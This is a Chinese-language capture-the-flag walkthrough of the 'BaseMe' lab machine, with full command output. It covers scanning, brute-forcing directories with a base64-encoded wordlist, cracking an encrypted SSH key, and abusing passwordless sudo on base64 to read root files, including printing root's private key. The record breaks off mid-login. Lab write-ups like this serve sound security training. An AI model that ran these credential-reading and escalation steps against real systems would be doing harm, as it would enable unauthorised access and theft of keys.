![\"image-20240412113443683\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313181.png\")
<\/div>\n
![\"image-20240412113843920\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313183.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nrustscan -a 172.20.10.3 -- -A<\/code><\/pre>\nOpen 172.20.10.3:22\nOpen 172.20.10.3:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 ca:09:80:f7:3a:da:5a:b6:19:d9:5c:41:47:43:d4:10 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+qOK8FpS9Ve5n4Vc\/JGRcLj5IpfEXKn2963jzjDUlYqbdLuoIAecfd53jrSp\/1FX2CjMVeQaFtFygaBzFlcL94oZg1jP60UI28mPhB+BOD7UfWSRbQbs2jIYOV5La4\/jIpc8Htyn0aGWBWL6ZrVooBmYR0yEmJRyUtnH9sQDtY5k0zIqXIO63P1DnukqTJbzXBd5s6JMa7VKx4gs1XF7xASb6ILNT\/T5U45K9e0si1fMCzwC0KXsuIBOnbBtzOUYSxlI6+PKPz\/fgrmpO86htnc8A\/af3mo9Pq6Jytrn+XjSX7hFA9UOhy8in9fUx7ZWyB5rffW0p6Vjpbxc1+bcT\n| 256 d0:75:48:48:b8:26:59:37:64:3b:25:7f:20:10:f8:70 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGzI3VdkTGf3FlIf4MVNCFjaO+1FDvyQ5lzs4W0S9pNSqzzph8oBhQaMWbUUv8EpN0EM0p0w8VY4V+MWDCqE9Pc=\n| 256 91:14:f7:93:0b:06:25:cb:e0:a5:30:e8:d3:d3:37:2b (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKKWXudaqjDSze7Ec72JtitmIyqlx9OlPIrVwkVZjDMJ\n80\/tcp open http syn-ack nginx 1.14.2\n| http-methods: \n|_ Supported Methods: GET HEAD\n|_http-server-header: nginx\/1.14.2\n|_http-title: Site doesn't have a title (text\/html).\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ gobuster dir -u http:\/\/172.20.10.3 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/172.20.10.3\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: png,php,zip,git,jpg,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h http:\/\/172.20.10.3<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 172.20.10.3\n+ Target Hostname: 172.20.10.3\n+ Target Port: 80\n+ Start Time: 2024-04-11 23:40:20 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: nginx\/1.14.2\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.\n+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host\n+ End Time: 2024-04-11 23:40:35 (GMT-4) (15 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u8e29\u70b9<\/h3>\nhttp:\/\/172.20.10.3\/<\/code><\/pre>\nQUxMLCBhYnNvbHV0ZWx5IEFMTCB0aGF0IHlvdSBuZWVkIGlzIGluIEJBU0U2NC4KSW5jbHVkaW5nIHRoZSBwYXNzd29yZCB0aGF0IHlvdSBuZWVkIDopClJlbWVtYmVyLCBCQVNFNjQgaGFzIHRoZSBhbnN3ZXIgdG8gYWxsIHlvdXIgcXVlc3Rpb25zLgotbHVjYXMK<\/code><\/pre>\n\u5c1d\u8bd5\u89e3\u7801\uff1a<\/p>\n
![\"image-20240412114218886\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u5f97\u5230\u4e00\u4e2a\u7528\u6237\u540dlucas<\/code>\uff0c\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\u4ee5\u53ca\u8bf7\u6c42\u5934\uff1a<\/p>\n<!--\niloveyou\nyouloveyou\nshelovesyou\nhelovesyou\nweloveyou\ntheyhatesme\n--><\/code><\/pre>\n<\/div><\/p>\n\u5c1d\u8bd5jwt\u89e3\u7801\u4e00\u4e0b\uff08\u5206\u6210\u4e09\u6bb5\u7684token\uff09:<\/p>\n
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjp0cnVlLCJpYXQiOjEzNTY5OTk1MjQsIm5iZiI6MTM1NzAwMDAwMH0.gBpFlpNfVUBlv9HuqXqVzRtaHR265PFagumX_OAKCMY<\/code><\/pre>\n<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u5c1d\u8bd5\u4f7f\u7528base64\u7f16\u7801\u540e\u7684\u5b57\u5178\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
for word in $(cat \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt);do echo $word | base64 >> b64dic.txt;done<\/code><\/pre>\n\u7136\u540e\u7b49\u4e00\u4e0b\u5c31\u884c\uff0c\u597d\u4e86\u4ee5\u540e\u8dd1\u4e00\u4e0b\uff0c\u53d1\u73b0\u6ca1\u4e1c\u897f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/baseme]\n\u2514\u2500$ ls\nb64dic.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/baseme]\n\u2514\u2500$ vim b64dic.txt \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/baseme]\n\u2514\u2500$ gobuster dir -u http:\/\/172.20.10.3 -w b64dic.txt -x php,zip,git,jpg,txt,png \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/172.20.10.3\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: b64dic.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,zip,git,jpg,txt,png\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 1582805 \/ 1582812 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u5c1d\u8bd5\u6362\u4e00\u4e2a\u5b57\u5178\/usr\/share\/wordlists\/dirb\/common.txt<\/code>\uff1a<\/p>\n\n\u5c31\u8fd9\u4fe9\u5b57\u5178\u5e38\u7528\uff0c\u603b\u4e0d\u80fd\u4f7f\u7528\u5927\u5b57\u5178\u5427\uff0c\u90a3\u7b49\u6b7b\u4eba\u4e86\u3002\u3002<\/p>\n<\/blockquote>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/baseme]\n\u2514\u2500$ for word in $(cat \/usr\/share\/wordlists\/dirb\/common.txt);do echo $word | base64 >> b64dic.txt;done\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/baseme]\n\u2514\u2500$ gobuster dir -u http:\/\/172.20.10.3 -w b64dic.txt -x php,zip,git,jpg,txt,png \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/172.20.10.3\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: b64dic.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: zip,git,jpg,txt,png,php\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/aWRfcnNhCg== (Status: 200) [Size: 2537]\n\/cm9ib3RzLnR4dAo= (Status: 200) [Size: 25]\nProgress: 1615124 \/ 1615131 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u770b\u4e00\u4e0b\u8fd9\u4fe9\u76ee\u5f55\uff0c\u4e0b\u8f7d\u4e0b\u6765\u4e24\u4e2a\u6587\u4ef6\uff1a<\/p>\n
# cm9ib3RzLnR4dAo= -> robots.txt\nTm90aGluZyBoZXJlIDooCg== -> Nothing here :(\n# aWRfcnNhCg== -> id_rsa\nLS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFB\nQUFBQ21GbGN6STFOaTFqZEhJQUFBQUdZbU55ZVhCMEFBQUFHQUFBQUJCVHhlOFlVTApCdHpmZnRB\nZFBncDhZWkFBQUFFQUFBQUFFQUFBRVhBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDWkNY\ndkVQbk8xCmNiaHhxY3RCRWNCRFpqcXJGZm9sd1ZLbXBCZ1kwN00zQ0s3cE8xMFVnQnNMeVl3QXpK\nRXc0ZTZZZ1BOU3lDRFdGYU5US0cKMDdqZ2NncmdncmU4ZVBDTU5GQkNBR2FZSG1MckZJc0tEQ0xJ\nNE5FNTR0NThJVUhlWENaejcyeFRvYkwvcHRMazI2UkJuaAo3YkhHMUpqR2x4T2tPNm0rMW9GTkx0\nTnVEMlFQbDhzYlp0RXpYNFM5bk5aL2RweVJwTWZtQjczck4zeXlJeWxldlZERXl2CmY3Q1o3b1JP\nNDZ1RGdGUHk1VnprbmRDZUpGMll0WkJYZjVnamMyZmFqTVh2cStiOG9sOFJaWjZqSFhBaGlibEJY\nd3BBbTQKdkxZZnh6STI3QlpGbm90ZUJuYmR6d1NMNWFwQkY1Z1lXSkFIS2ovSjZNaERqMUdLQUZj\nMUFBQUQwTjlVRFRjVXh3TXQ1WApZRklaSzhpZUJMME5PdXdvY2RnYlV1a3RDMjFTZG5TeTZvY1cz\naW1NKzNteldqUGRvQksvSG8zMzl1UG1CV0k1c2JNcnBLCnhrWk1ubCtyY1RiZ3o0c3d2OGdOdUto\nVWM3d1RndHJOWCtQTk1kSUFMTnBzeFlMdC9sNTZHSzhSNEo4ZkxJVTUrTW9qUnMKKzFOcllzOEo0\ncm5PMXFXTm9KUlpvRGxBYVlxQlY5NWNYb0FFa3dVSFZ1c3RmZ3hVdHJZS3ArWVBGSWd4OG9rTWpK\nZ25iaQpOTlczVHp4bHVOaTVvVWhhbEgyREoya2hLREdRVWk5Uk9GY3NFWGVKWHQzbGdwWlp0MWhy\nUURBMW84alRYZVM0K2RXN25aCnpqZjNwME03N2IvTnZjWkUrb1hZUTFnNVhwMVFTT1Niait0bG13\nNTRMN0VxYjFVaFpnblE3WnNLQ29hWTlTdUFjcW0zRTAKSUpoK0krWnYxZWdTTVMvRE9ISXhPM3Bz\nUWtjaUxqa3BhK0d0d1FNbDFaQUpIUWFCNnE3MEpKY0JDZlZzeWtkWTUyTEtESQpweFpZcExabXlE\neDhUVGFBOEpPbXZHcGZOWmtNVTRJMGk1L1pUNjVTUkZKMU5sQkNOd2N3dE9sOWs0UFc1TFZ4TnNH\nUkNKCk1KcjhrNUFjMENYMDNmWEVTcG1zVVVWUysvRGovaG50SHc4OWRPOEhjcXFJVUVwZUViZlRX\nTHZheDBDaVNoM0tqU2NlSnAKKzhnVXlER3ZDa2N5Vm5lVVFqbW1yUnN3UmhUTnh4S1JCWnNla0d3\nSHBvOGhEWWJVRUZacXp6TEFRYkJJQWRybDF0dDdtVgp0VkJybXBNNkN3SmR6WUVsMjFGYUs4anZk\neUN3UHI1SFVndHV4clNwTHZuZGNud1BheEpXR2k0UDQ3MUREWmVSWURHY1doCmk2YklDckxRZ2VK\nbEhhRVVtclFDNVJkdjAzendJOVU4RFhVWi9PSGI0MFBMOE1YcUJ0VS9iNkNFVTlKdXpKcEJyS1or\naysKdFNuN2hyOGhwcFQydFVTeER2QytVU01tdy9XRGZha2pmSHBvTndoN1B0NWkwY3d3cGtYRlF4\nSlB2UjBiTHh2WFpuKzN4dwpON2J3NDVGaEJaQ3NIQ0FiVjIraFZzUDBseXhDUU9qN3lHa0JqYTg3\nUzFlMHE2V1pqakI0U3ByZW5Ia083dGc1UTBIc3VNCkFpZi8wMkhIeldHK0NSL0lHbEZzTnRxMXZ5\nbHQyeCtZLzA5MXZDa1JPQkRhd2pIei84b2d5MkZ6ZzhKWVRlb0xrSHdER1EKTytUb3dBMTBSQVRl\nazZaRUl4aDZTbXRERy9WNXplV0N1RW1LNHNSVDNxMUZTdnBCMS9IK0Z4c0dDb1BJZzhGemNpR0No\nMgpUTHVza2NYaWFnbnM5TjFSTE9ubEhoaVpkOFJaQTBaZzdvWklhQnZhWm5oWllHeWNwQUpwV0tl\nYmpydG9rTFl1TWZYUkxsCjMvU0FlVWw3MkVBM20xRElueHNQZ3VGdWswMHJvTWM3N042ZXJZN3Rq\nT1pMVllQb1NpeWdEUjFBN2Yzell6KzBpRkk0ckwKTkQ4aWtnbVF2RjZocnd3SkJycC8weEtFYU1U\nQ0tMdnl5WjNlRFNkQkRQcmtUaGhGd3JQcEk2K0V4OFJ2Y1dJNmJUSkFXSgpMZG1tUlhVUy9EdE8r\nNjkvYWlkdnhHQVlvYisxTT0KLS0tLS1FTkQgT1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==\n-------->\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBTxe8YUL\nBtzfftAdPgp8YZAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQCZCXvEPnO1\ncbhxqctBEcBDZjqrFfolwVKmpBgY07M3CK7pO10UgBsLyYwAzJEw4e6YgPNSyCDWFaNTKG\n07jgcgrggre8ePCMNFBCAGaYHmLrFIsKDCLI4NE54t58IUHeXCZz72xTobL\/ptLk26RBnh\n7bHG1JjGlxOkO6m+1oFNLtNuD2QPl8sbZtEzX4S9nNZ\/dpyRpMfmB73rN3yyIylevVDEyv\nf7CZ7oRO46uDgFPy5VzkndCeJF2YtZBXf5gjc2fajMXvq+b8ol8RZZ6jHXAhiblBXwpAm4\nvLYfxzI27BZFnoteBnbdzwSL5apBF5gYWJAHKj\/J6MhDj1GKAFc1AAAD0N9UDTcUxwMt5X\nYFIZK8ieBL0NOuwocdgbUuktC21SdnSy6ocW3imM+3mzWjPdoBK\/Ho339uPmBWI5sbMrpK\nxkZMnl+rcTbgz4swv8gNuKhUc7wTgtrNX+PNMdIALNpsxYLt\/l56GK8R4J8fLIU5+MojRs\n+1NrYs8J4rnO1qWNoJRZoDlAaYqBV95cXoAEkwUHVustfgxUtrYKp+YPFIgx8okMjJgnbi\nNNW3TzxluNi5oUhalH2DJ2khKDGQUi9ROFcsEXeJXt3lgpZZt1hrQDA1o8jTXeS4+dW7nZ\nzjf3p0M77b\/NvcZE+oXYQ1g5Xp1QSOSbj+tlmw54L7Eqb1UhZgnQ7ZsKCoaY9SuAcqm3E0\nIJh+I+Zv1egSMS\/DOHIxO3psQkciLjkpa+GtwQMl1ZAJHQaB6q70JJcBCfVsykdY52LKDI\npxZYpLZmyDx8TTaA8JOmvGpfNZkMU4I0i5\/ZT65SRFJ1NlBCNwcwtOl9k4PW5LVxNsGRCJ\nMJr8k5Ac0CX03fXESpmsUUVS+\/Dj\/hntHw89dO8HcqqIUEpeEbfTWLvax0CiSh3KjSceJp\n+8gUyDGvCkcyVneUQjmmrRswRhTNxxKRBZsekGwHpo8hDYbUEFZqzzLAQbBIAdrl1tt7mV\ntVBrmpM6CwJdzYEl21FaK8jvdyCwPr5HUgtuxrSpLvndcnwPaxJWGi4P471DDZeRYDGcWh\ni6bICrLQgeJlHaEUmrQC5Rdv03zwI9U8DXUZ\/OHb40PL8MXqBtU\/b6CEU9JuzJpBrKZ+k+\ntSn7hr8hppT2tUSxDvC+USMmw\/WDfakjfHpoNwh7Pt5i0cwwpkXFQxJPvR0bLxvXZn+3xw\nN7bw45FhBZCsHCAbV2+hVsP0lyxCQOj7yGkBja87S1e0q6WZjjB4SprenHkO7tg5Q0HsuM\nAif\/02HHzWG+CR\/IGlFsNtq1vylt2x+Y\/091vCkROBDawjHz\/8ogy2Fzg8JYTeoLkHwDGQ\nO+TowA10RATek6ZEIxh6SmtDG\/V5zeWCuEmK4sRT3q1FSvpB1\/H+FxsGCoPIg8FzciGCh2\nTLuskcXiagns9N1RLOnlHhiZd8RZA0Zg7oZIaBvaZnhZYGycpAJpWKebjrtokLYuMfXRLl\n3\/SAeUl72EA3m1DInxsPguFuk00roMc77N6erY7tjOZLVYPoSiygDR1A7f3zYz+0iFI4rL\nND8ikgmQvF6hrwwJBrp\/0xKEaMTCKLvyyZ3eDSdBDPrkThhFwrPpI6+Ex8RvcWI6bTJAWJ\nLdmmRXUS\/DtO+69\/aidvxGAYob+1M=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
<\/div><\/p>\n\u554a\uff0c\u8fd9\u4e2a\u79c1\u94a5\u8fd8\u52a0\u5bc6\u4e86\uff1f<\/p>\n
\u5c1d\u8bd5\u7f16\u7801\u4e4b\u524d\u4e3b\u9875\u627e\u5230\u7684\u90a3\u51e0\u4e32\u76f8\u4f3c\u5b57\u7b26\uff1a<\/p>\n
iloveyou -> aWxvdmV5b3UK\nyouloveyou -> eW91bG92ZXlvdQo=\nshelovesyou -> c2hlbG92ZXN5b3UK\nhelovesyou -> aGVsb3Zlc3lvdQo=\nweloveyou -> d2Vsb3ZleW91Cg==\ntheyhatesme -> dGhleWhhdGVzbWUK\n\nfor word in $(cat pass.txt);do echo $word | base64 >> b64pass.txt;done<\/code><\/pre>\n\u5c1d\u8bd5\u4e00\u4e0b\uff0c\u53d1\u73b0\u7b2c\u4e00\u4e2a\u5c31\u662f\u5bf9\u7684\uff01<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nlucas@baseme:~$ ls -la\ntotal 40\ndrwxr-xr-x 4 lucas lucas 4096 Sep 28 2020 .\ndrwxr-xr-x 3 root root 4096 Sep 28 2020 ..\n-rw------- 1 lucas lucas 15 Sep 28 2020 .bash_history\n-rw-r--r-- 1 lucas lucas 220 Sep 28 2020 .bash_logout\n-rw-r--r-- 1 lucas lucas 3526 Sep 28 2020 .bashrc\ndrwxr-xr-x 3 lucas lucas 4096 Sep 28 2020 .local\n-rw-r--r-- 1 lucas lucas 807 Sep 28 2020 .profile\ndrwx------ 2 lucas lucas 4096 Sep 28 2020 .ssh\n-rw-r--r-- 1 lucas lucas 1685 Sep 28 2020 user.txt\n-rw------- 1 lucas lucas 52 Sep 28 2020 .Xauthority\nlucas@baseme:~$ cat user.txt \n . ** \n * *. \n ,* \n *, \n , ,* \n ., *, \n \/ * \n ,* *, \n \/. .*. \n * ** \n ,* ,* \n ** *. \n ** **. \n ,* ** \n *, ,* \n * ** \n *, .* \n *. ** \n ** ,*, \n ** *, \n\nHMV8nnJAJAJA \nlucas@baseme:~$ sudo -l\nMatching Defaults entries for lucas on baseme:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser lucas may run the following commands on baseme:\n (ALL) NOPASSWD: \/usr\/bin\/base64\nlucas@baseme:~$ sudo \/usr\/bin\/base64 \/root\/root.txt \nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAuICAgICAqKiAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAq\nICAgICAgICAgICAqLiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICwqICAgICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg\nICAgICAgICosICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAg\nICAgICAgICwgICAgICAgICAgICAgICAgICAgICAgICAgLCogICAgICAgICAgICAgICAgICAgICAg\nICAgICAKICAgICAgICAgICAgICAgICAgICAgIC4sICAgICAgICAgICAgICAgICAgICAgICAgICAg\nICAgKiwgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAvICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKiAgICAgICAgICAgICAgICAgICAgICAKICAg\nICAgICAgICAgICAgICAsKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAq\nLCAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgLy4gICAgICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAgIC4qLiAgICAgICAgICAgICAgICAKICAgICAgICAgICAg\nICogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICoqICAg\nICAgICAgICAgICAKICAgICAgICAgICAgICwqICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAgICAsKiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICoqICAg\nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKi4gICAgICAgICAgICAgICAg\nICAKICAgICAgICAgICAgICAgICAgICoqICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg\nICAgKiouICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgLCogICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAgICoqICAgICAgICAgICAgICAgICAgICAgICAKICAgICAg\nICAgICAgICAgICAgICAgICAgKiwgICAgICAgICAgICAgICAgICAgICAgICAgICwqICAgICAgICAg\nICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgKiAgICAgICAgICAg\nICAgICAgICAgICAqKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAqLCAgICAgICAgICAgICAgICAuKiAgICAgICAgICAgICAgICAgICAgICAg\nICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqLiAgICAgICAgICAgKiog\nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAg\nICAgICAgICAgICoqICAgICAgLCosICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAK\nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICoqICosICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAKSE1WRktCUzY0Cg==\nlucas@baseme:~$ sudo \/usr\/bin\/base64 \/root\/root.txt | base64 -d\n . ** \n * *. \n ,* \n *, \n , ,* \n ., *, \n \/ * \n ,* *, \n \/. .*. \n * ** \n ,* ,* \n ** *. \n ** **. \n ,* ** \n *, ,* \n * ** \n *, .* \n *. ** \n ** ,*, \n ** *, \n\nHMVFKBS64<\/code><\/pre>\n\u989d\uff0c\u867d\u7136\u62ff\u5230flag\u4e86\uff0c\u4f46\u662f\u4e0d\u662f\u6211\u60f3\u8981\u7684\uff0c\u7ee7\u7eed\u5c1d\u8bd5\u83b7\u53d6rootshell\uff01<\/p>\n
\u5c1d\u8bd5\u4e00\u4e0b\u6628\u5929\u6ca1\u8bb0\u4f4f\u7684\u90a3\u4e2aCapabilities<\/code>\u6743\u9650\u67e5\u8be2\uff1a<\/p>\nlucas@baseme:~$ \/usr\/sbin\/getcap -r 2>\/dev\/null<\/code><\/pre>\n\u6ca1\u4e1c\u897f\uff0c\u53ea\u80fd\u8bfb\u53d6\u79c1\u94a5\u4e86\uff0c\u7136\u540essh\u767b\u5f55\uff1a<\/p>\n
lucas@baseme:~$ \/usr\/sbin\/getcap -r 2>\/dev\/null\nlucas@baseme:~$ base64 \/root\/.ssh\/id_rsa | base64 -d\nbase64: \/root\/.ssh\/id_rsa: Permission denied\nlucas@baseme:~$ sudo base64 \/root\/.ssh\/id_rsa | base64 -d\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAw6MgMnxUy+W9oem0Uhr2cJiez37qVubRK9D4kdu7H5NQ\/Z0FFp2B\nIdV3wx9xDWAICJgtYQUvOV7KFNAWvEXTDdhBwdiUcWEJ4AOXK7+5v7x4b8vuG5zK0lTVxp\nDEBE8faPj3UaHsa1JUVaDngTIkCa6VBICvG0DCcfL8xHBpCSIfoHfpqmOpWT\/pWXvGI3tk\n\/Ku\/STY7Ay8HtSgoqCcf3F+lb9J9kwKhFg9eLO5QDuFujb1CN7gUy8xhgNanUViyCZRwn7\npx+DfU+nscSEfG1zgfgqn2hCbBYqaP0jBgWcVL6YoMiwCS3jhmeFG4C\/p51j3gI6b8yz9a\nS+DtdTpDwQAAA8D82\/wZ\/Nv8GQAAAAdzc2gtcnNhAAABAQDDoyAyfFTL5b2h6bRSGvZwmJ\n7PfupW5tEr0PiR27sfk1D9nQUWnYEh1XfDH3ENYAgImC1hBS85XsoU0Ba8RdMN2EHB2JRx\nYQngA5crv7m\/vHhvy+4bnMrSVNXGkMQETx9o+PdRoexrUlRVoOeBMiQJrpUEgK8bQMJx8v\nzEcGkJIh+gd+mqY6lZP+lZe8Yje2T8q79JNjsDLwe1KCioJx\/cX6Vv0n2TAqEWD14s7lAO\n4W6NvUI3uBTLzGGA1qdRWLIJlHCfunH4N9T6exxIR8bXOB+CqfaEJsFipo\/SMGBZxUvpig\nyLAJLeOGZ4UbgL+nnWPeAjpvzLP1pL4O11OkPBAAAAAwEAAQAAAQBIArRoQOGJh9AMWBS6\noBgUC+lw4Ptq710Q7sOAFMxE7BnEsFZeI62TgZqqpNkdHjr2xuT1ME5YpK5niMzFkkIEd5\nSEwK6rKRfUcB3lyZWaoMoIBJ1pZoY1c2qYw1KTb3hVUEbgsmRugIhwWGC+anFfavaJCMDr\nnCO2g8VMnT\/cTyAv\/Qmi8m868KNEzcuzGV5ozHl1XLffHM9R\/cqPPyAYaQIa9Z+kS6ou9R\niMTjTSxOPnfh286kgx0ry1se9BBlrEc5251R\/PRkEKYrMj3AIwI30qvYlAtNfcCFhoJXLq\nvWystPARwiUs7WYBUHRf6bPP\/pHTTvwwb2bs51ngImpdAAAAgDaWnQ7Lj7Vp+mTjhSu4oG\nptDHNd2uuqB1+CHRcaVutUmknxvxG3p957UbvNp6e0+ePKtAIakrzbpAo6u25poyWugAuz\nX2nQhqsQh6yrThDJlTiDMeV7JNGFbGOcanXXXHt3tjfyrS0+aM87WmwqNyh6nfgy1C5axR\nfKZG8ivz5iAAAAgQD83QmCIcbZaCOlGwgHGcuCUDcxGY1QlIRnbM5VAjimNezGFs9f0ExD\nSiTwFsmITP\/\/njsbRZP2laiKKO6j4yp5LpfgDB5QHs+g4nXvDn6ns64gCKo7tf2bPP8VCe\nFWyc2JyqREwE3WmyhkPlyr9xAZerZ+7Fz+NFueRYzDklWg8wAAAIEAxhBeLqbo6\/GUKXF5\nrFRatLXI43Jrd9pyvLx62KghsnEBEk7my9sbU5dvYBLztS+lfPCRxV2ZzpjYdN4SDJbXIR\ntxBaLJe3c4uIc9WjyxGwUK9IL65rSrRVERHsTO525ofPWGQEa2A+pRCpz3A4Y41fy8Y9an\n2B2NmfTAfEkWFXsAAAALcm9vdEBiYXNlbWU=\n-----END OPENSSH PRIVATE KEY-----\nlucas@baseme:~$ cd \/tmp\nlucas@baseme:\/tmp$ vim id_rsa\n-bash: vim: command not found\nlucas@baseme:\/tmp$ vi id_rsa\nlucas@baseme:\/tmp$ chmod 600 id_rsa\nlucas@baseme:\/tmp$ ssh root@172.20.10.3 -i id_rsa\nThe authenticity of host '172.20.10.3 